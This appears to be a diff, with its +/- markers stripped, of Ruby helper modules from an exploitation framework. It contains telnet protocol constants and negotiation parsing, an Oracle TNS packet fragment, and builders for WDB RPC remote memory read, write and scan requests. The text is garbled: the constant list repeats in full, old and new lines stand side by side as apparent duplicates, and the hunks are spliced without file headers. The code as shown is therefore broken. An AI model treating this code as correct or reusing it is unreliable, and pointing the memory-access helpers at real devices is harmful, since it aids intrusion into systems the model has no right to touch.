WONT = 252.chr # "\374" # "\xfc" # I won't use option
WILL = 251.chr # "\373" # "\xfb" # I will use option
SB = 250.chr # "\372" # "\xfa" # interpret as subnegotiation
GA = 249.chr # "\371" # "\xf9" # you may reverse the line
EL = 248.chr # "\370" # "\xf8" # erase the current line
EC = 247.chr # "\367" # "\xf7" # erase the current character
AYT = 246.chr # "\366" # "\xf6" # are you there
AO = 245.chr # "\365" # "\xf5" # abort output--but let prog finish
IP = 244.chr # "\364" # "\xf4" # interrupt process--permanently
BREAK = 243.chr # "\363" # "\xf3" # break
DM = 242.chr # "\362" # "\xf2" # data mark--for connect. cleaning
NOP = 241.chr # "\361" # "\xf1" # nop
SE = 240.chr # "\360" # "\xf0" # end sub negotiation
EOR = 239.chr # "\357" # "\xef" # end of record (transparent mode)
ABORT = 238.chr # "\356" # "\xee" # Abort process
SUSP = 237.chr # "\355" # "\xed" # Suspend process
EOF = 236.chr # "\354" # "\xec" # End of file
SYNCH = 242.chr # "\362" # "\xf2" # for telfunc calls
OPT_BINARY = 0.chr # "\000" # "\x00" # Binary Transmission
OPT_ECHO = 1.chr # "\001" # "\x01" # Echo
OPT_RCP = 2.chr # "\002" # "\x02" # Reconnection
OPT_SGA = 3.chr # "\003" # "\x03" # Suppress Go Ahead
OPT_NAMS = 4.chr # "\004" # "\x04" # Approx Message Size Negotiation
OPT_STATUS = 5.chr # "\005" # "\x05" # Status
OPT_TM = 6.chr # "\006" # "\x06" # Timing Mark
OPT_RCTE = 7.chr # "\a" # "\x07" # Remote Controlled Trans and Echo
OPT_NAOL = 8.chr # "\010" # "\x08" # Output Line Width
OPT_NAOP = 9.chr # "\t" # "\x09" # Output Page Size
OPT_NAOCRD = 10.chr # "\n" # "\x0a" # Output Carriage-Return Disposition
OPT_NAOHTS = 11.chr # "\v" # "\x0b" # Output Horizontal Tab Stops
OPT_NAOHTD = 12.chr # "\f" # "\x0c" # Output Horizontal Tab Disposition
OPT_NAOFFD = 13.chr # "\r" # "\x0d" # Output Formfeed Disposition
OPT_NAOVTS = 14.chr # "\016" # "\x0e" # Output Vertical Tabstops
OPT_NAOVTD = 15.chr # "\017" # "\x0f" # Output Vertical Tab Disposition
OPT_NAOLFD = 16.chr # "\020" # "\x10" # Output Linefeed Disposition
OPT_XASCII = 17.chr # "\021" # "\x11" # Extended ASCII
OPT_LOGOUT = 18.chr # "\022" # "\x12" # Logout
OPT_BM = 19.chr # "\023" # "\x13" # Byte Macro
OPT_DET = 20.chr # "\024" # "\x14" # Data Entry Terminal
OPT_SUPDUP = 21.chr # "\025" # "\x15" # SUPDUP
OPT_SUPDUPOUTPUT = 22.chr # "\026" # "\x16" # SUPDUP Output
OPT_SNDLOC = 23.chr # "\027" # "\x17" # Send Location
OPT_TTYPE = 24.chr # "\030" # "\x18" # Terminal Type
OPT_EOR = 25.chr # "\031" # "\x19" # End of Record
OPT_TUID = 26.chr # "\032" # "\x1a" # TACACS User Identification
OPT_OUTMRK = 27.chr # "\e" # "\x1b" # Output Marking
OPT_TTYLOC = 28.chr # "\034" # "\x1c" # Terminal Location Number
OPT_3270REGIME = 29.chr # "\035" # "\x1d" # Telnet 3270 Regime
OPT_X3PAD = 30.chr # "\036" # "\x1e" # X.3 PAD
OPT_NAWS = 31.chr # "\037" # "\x1f" # Negotiate About Window Size
OPT_TSPEED = 32.chr # " " # "\x20" # Terminal Speed
OPT_LFLOW = 33.chr # "!" # "\x21" # Remote Flow Control
OPT_LINEMODE = 34.chr # "\"" # "\x22" # Linemode
OPT_XDISPLOC = 35.chr # "#" # "\x23" # X Display Location
OPT_OLD_ENVIRON = 36.chr # "$" # "\x24" # Environment Option
OPT_AUTHENTICATION = 37.chr # "%" # "\x25" # Authentication Option
OPT_ENCRYPT = 38.chr # "&" # "\x26" # Encryption Option
OPT_NEW_ENVIRON = 39.chr # "'" # "\x27" # New Environment Option
OPT_EXOPL = 255.chr # "\377" # "\xff" # Extended-Options-List
OPT_BINARY = 0.chr # "\000" # "\x00" # Binary Transmission
OPT_ECHO = 1.chr # "\001" # "\x01" # Echo
OPT_RCP = 2.chr # "\002" # "\x02" # Reconnection
OPT_SGA = 3.chr # "\003" # "\x03" # Suppress Go Ahead
OPT_NAMS = 4.chr # "\004" # "\x04" # Approx Message Size Negotiation
OPT_STATUS = 5.chr # "\005" # "\x05" # Status
OPT_TM = 6.chr # "\006" # "\x06" # Timing Mark
OPT_RCTE = 7.chr # "\a" # "\x07" # Remote Controlled Trans and Echo
OPT_NAOL = 8.chr # "\010" # "\x08" # Output Line Width
OPT_NAOP = 9.chr # "\t" # "\x09" # Output Page Size
OPT_NAOCRD = 10.chr # "\n" # "\x0a" # Output Carriage-Return Disposition
OPT_NAOHTS = 11.chr # "\v" # "\x0b" # Output Horizontal Tab Stops
OPT_NAOHTD = 12.chr # "\f" # "\x0c" # Output Horizontal Tab Disposition
OPT_NAOFFD = 13.chr # "\r" # "\x0d" # Output Formfeed Disposition
OPT_NAOVTS = 14.chr # "\016" # "\x0e" # Output Vertical Tabstops
OPT_NAOVTD = 15.chr # "\017" # "\x0f" # Output Vertical Tab Disposition
OPT_NAOLFD = 16.chr # "\020" # "\x10" # Output Linefeed Disposition
OPT_XASCII = 17.chr # "\021" # "\x11" # Extended ASCII
OPT_LOGOUT = 18.chr # "\022" # "\x12" # Logout
OPT_BM = 19.chr # "\023" # "\x13" # Byte Macro
OPT_DET = 20.chr # "\024" # "\x14" # Data Entry Terminal
OPT_SUPDUP = 21.chr # "\025" # "\x15" # SUPDUP
OPT_SUPDUPOUTPUT = 22.chr # "\026" # "\x16" # SUPDUP Output
OPT_SNDLOC = 23.chr # "\027" # "\x17" # Send Location
OPT_TTYPE = 24.chr # "\030" # "\x18" # Terminal Type
OPT_EOR = 25.chr # "\031" # "\x19" # End of Record
OPT_TUID = 26.chr # "\032" # "\x1a" # TACACS User Identification
OPT_OUTMRK = 27.chr # "\e" # "\x1b" # Output Marking
OPT_TTYLOC = 28.chr # "\034" # "\x1c" # Terminal Location Number
OPT_3270REGIME = 29.chr # "\035" # "\x1d" # Telnet 3270 Regime
OPT_X3PAD = 30.chr # "\036" # "\x1e" # X.3 PAD
OPT_NAWS = 31.chr # "\037" # "\x1f" # Negotiate About Window Size
OPT_TSPEED = 32.chr # " " # "\x20" # Terminal Speed
OPT_LFLOW = 33.chr # "!" # "\x21" # Remote Flow Control
OPT_LINEMODE = 34.chr # "\"" # "\x22" # Linemode
OPT_XDISPLOC = 35.chr # "#" # "\x23" # X Display Location
OPT_OLD_ENVIRON = 36.chr # "$" # "\x24" # Environment Option
OPT_AUTHENTICATION = 37.chr # "%" # "\x25" # Authentication Option
OPT_ENCRYPT = 38.chr # "&" # "\x26" # Encryption Option
OPT_NEW_ENVIRON = 39.chr # "'" # "\x27" # New Environment Option
OPT_EXOPL = 255.chr # "\377" # "\xff" # Extended-Options-List
NULL = "\000"
CR = "\015"
LF = "\012"
EOL = CR + LF
NULL = "\000"
CR = "\015"
LF = "\012"
EOL = CR + LF
#
@ -213,12 +213,10 @@ module Exploit::Remote::Telnet
data.gsub!(/#{EOL}/no, "\n")
data.gsub!(/#{IAC}(
[#{IAC}#{AO}#{AYT}#{DM}#{IP}#{NOP}]|
[#{DO}#{DONT}#{WILL}#{WONT}]
[#{OPT_BINARY}-#{OPT_NEW_ENVIRON}#{OPT_EXOPL}]|
#{SB}[^#{IAC}]*#{IAC}#{SE}
)/xno) do
m = $1
[#{IAC}#{AO}#{AYT}#{DM}#{IP}#{NOP}]|[#{DO}#{DONT}#{WILL}#{WONT}]
[#{OPT_BINARY}-#{OPT_NEW_ENVIRON}#{OPT_EXOPL}]|#{SB}[^#{IAC}]*#{IAC}#{SE}
)/xno) do
m = $1
if m == IAC
IAC
@ -249,12 +247,12 @@ module Exploit::Remote::Telnet
''
elsif m[0,1] == WONT
fd.write(IAC + DONT + m[1,1])
''
''
else
''
end
end
@trace << data
end
@trace << data
@recvd << data
fd.flush


@ -82,7 +82,7 @@ module Exploit::Remote::TNS
# Version
pkt << "\x01\x39"
# Version (Compatible)
pkt << "\x01\x2C"
pkt << "\x01\x2C"
pkt << "\x00\x81\x08\x00"
pkt << "\x7F\xFF"
pkt << "\x7F\x08"


@ -50,9 +50,9 @@ module Exploit::Remote::WDBRPC
# WDB_MEM_REGION
data << [
offset, # baseAddress
length, # numberOfBytes
params, # params
offset, # baseAddress
length, # numberOfBytes
params, # params
].pack("N*")
wdbrpc_request(40, data)
@ -63,9 +63,9 @@ module Exploit::Remote::WDBRPC
# WDB_MEM_REGION
data = [
offset, # baseAddress
length, # numberOfBytes
params, # params
offset, # baseAddress
length, # numberOfBytes
params, # params
].pack("N*")
wdbrpc_request(10, data)
@ -75,7 +75,7 @@ module Exploit::Remote::WDBRPC
# Make sure its DWORD aligned
while(buff.length % 4 != 0)
buff << "\x00"
buff << "\x00"
end
# WDB_MEM_XFER
@ -92,14 +92,14 @@ module Exploit::Remote::WDBRPC
def wdbrpc_request_memscan(offset=0, depth=1024, buff='', params=0)
# Make sure its DWORD aligned
while(buff.length % 4 != 0)
buff << "\x00"
buff << "\x00"
end
# WDB_MEM_REGION
data = [
offset, # baseAddress
depth, # numberOfBytes
params, # params
offset, # baseAddress
depth, # numberOfBytes
params, # params
].pack("N*")
# WDB_MEM_XFER